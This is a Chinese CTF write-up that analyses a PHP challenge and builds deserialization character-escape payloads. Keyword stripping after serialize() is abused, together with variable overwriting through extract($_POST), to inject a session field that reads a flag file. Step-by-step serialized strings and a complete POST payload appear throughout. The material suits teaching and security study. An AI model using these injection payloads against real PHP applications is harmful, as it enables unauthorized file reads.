源码分析
建议先看 详解PHP反序列化中的字符逃逸
题目直接给了源码,第一步,先搞明白代码的逻辑,本文无图片
filter 函数将 $img 中含有的 数组中的元素 替换为 空
function filter($img){
$filter_arr = array('php','flag','php5','php4','fl1g');
$filter = '/'.implode('|',$filter_arr).'/i';
// 正则表达式 /php|flag|php5|php4|fl1g/
return preg_replace($filter,'',$img);
}
然后看到 extract($_POST); 说明有变量覆盖
然后是如果 img_path 为空,就 base64_encode 字符串 guest_img.png 否则就先 base64_encode img_path 再 sha1 加密
if(!$_GET['img_path']){
$_SESSION['img'] = base64_encode('guest_img.png');
}else{
$_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}
然后就是对 session 进行序列化并执行 filter 函数,这里就应该会存在字符逃逸了
$serialize_info = filter(serialize($_SESSION));
最后是对 $_GET['f'] 的判断,执行不同功能,在 phpinfo 发现 auto_append_file : d0g3_f1ag.php
if($function == 'highlight_file'){
highlight_file('1.php');
}else if($function == 'phpinfo'){
eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){
$userinfo = unserialize($serialize_info);
echo file_get_contents(base64_decode($userinfo['img']));
}
漏洞分析
现在的目的很明确,就是要读取 d0g3_f1ag.php 这个文件,利用逃逸使 session 中的 img 字段为 ZDBnM19mMWFnLnBocA== 即 base64_encode(d0g3_f1ag.php) ,然后在 show_image 中读取。
由于 extract($_POST) 的存在,可以利用变量覆盖修改 $_SESSION["user"],$_SESSION['function'] 和 $function,或者是在 _SESSION 中插入参数
user + function 逃逸
先看一个正常的 session 文件经过序列化之后的结果,user 和 function 字段是可控的
a:3:{s:4:"user";s:5:"guest";s:8:"function";s:10:"show_image";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
这里就有两个位置可以逃逸,先看一下 function 这里
a:3:{s:4:"user";s:5:"guest";s:8:"function";s:7:"aphpphp";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
filter 处理之后
a:3:{s:4:"user";s:5:"guest";s:8:"function";s:7:"a";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
我们的目标,发现这样行不通,覆盖掉 img 字段后,无法控制 object 的注入,就考虑结合 user 一起
a:3:{s:4:"user";s:5:"guest";s:8:"function";s:39:"a";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";s:6:"object";s:6:"inject";}
变成这样 {1} {2} 为可控输入,要注入对象的话,{2} 的内容长度一定会大于 10,所以考虑覆盖掉 ";s:8:"function";s:10:" ,长度为 23,扩展成 3 或 4 的倍数( 根据 filter 函数),就是 ";s:8:"function";s:10:"a
a:3:{s:4:"user";s:5:"{1}";s:8:"function";s:10:"{2}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
这就变成这个样子
a:3:{s:4:"user";s:24:"flagflagflagflagflagflag";s:8:"function";s:10:"a{2}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
经过 filter 函数处理
a:3:{s:4:"user";s:24:"";s:8:"function";s:10:"a{2}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
然后就是 {2} 的输入内容,要让 img 字段为 ZDBnM19mMWFnLnBocA== 即 base64_encode(d0g3_f1ag.php) ,还要闭合前面的 " ,那么 {2} 就是 ";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";
a:3:{s:4:"user";s:24:"";s:8:"function";s:10:"a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
这样还存在问题,"; 如何处理,可以结合 php 反序列化在 } 后的数据将直接被丢弃这个特点,直接构造一个结束符。{2} 为 ";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";
a:3:{s:4:"user";s:24:"";s:8:"function";s:10:"a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
这还有一个问题,这个反序列化之后的数组应该有 3 个元素,这样构造只剩下 2 个,这就需要再加一个元素,随便加即可
a:3:{s:4:"user";s:24:"";s:8:"function";s:10:"a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:1:"a";s:1:"a";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
反序列化结果
array(3) {
'user' =>
string(24) "";s:8:"function";s:10:"a"
'img' =>
string(20) "ZDBnM19mMWFnLnBocA=="
'a' =>
string(1) "a"
}
payload
_SESSION[user]=flagflagflagflagflagflag&_SESSION[function]=a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:1:"a";s:1:"a";}&function=show_image
插入字段逃逸
前面说了,可以利用 user 和 function 逃逸,也可以在 session 中插入字段,进行逃逸,原始的结果
a:3:{s:4:"user";s:5:"guest";s:8:"function";s:10:"show_image";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
post 插入字段参数 _SESSION[user]=aaaa&_SESSION[function]=bbbb&_SESSION[cccc]=dddd 之后
a:4:{s:4:"user";s:4:"aaaa";s:8:"function";s:4:"bbbb";s:4:"cccc";s:4:"dddd";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
不动 user 和 function ,img 在插入的字段之后,可控点就是,session 的字段及对应的参数,利用 {1} 逃逸,利用 {2} 注入
a:4:{s:4:"user";s:4:"aaaa";s:8:"function";s:4:"bbbb";s:4:"{1}";s:4:"{2}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
";s:4:" 长度为 7 ,但是对象注入长度肯定大于 10,那就是 ";s:10:" 长度 8,则 {1} 就是 flagflag
a:4:{s:4:"user";s:4:"aaaa";s:8:"function";s:4:"bbbb";s:8:"flagflag";s:10:"{2}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
{2} 处进行闭合 + 对象注入的操作,闭合前面的 " ,插入分隔符 ; ,闭合 {} 结束符,插入 s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";
a:4:{s:4:"user";s:4:"aaaa";s:8:"function";s:4:"bbbb";s:8:"flagflag";s:10:"";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
经过 filter 函数处理
a:4:{s:4:"user";s:4:"aaaa";s:8:"function";s:4:"bbbb";s:8:"";s:10:"";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
这就发现一个问题,s:8:""; 这里只有属性名,缺少属性值,需要加上
a:4:{s:4:"user";s:4:"aaaa";s:8:"function";s:4:"bbbb";s:8:"";s:10:"";s:1:"a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
反序列化结果
array(4) {
'user' =>
string(4) "aaaa"
'function' =>
string(4) "bbbb"
'";s:10:"' =>
string(1) "a"
'img' =>
string(20) "ZDBnM19mMWFnLnBocA=="
}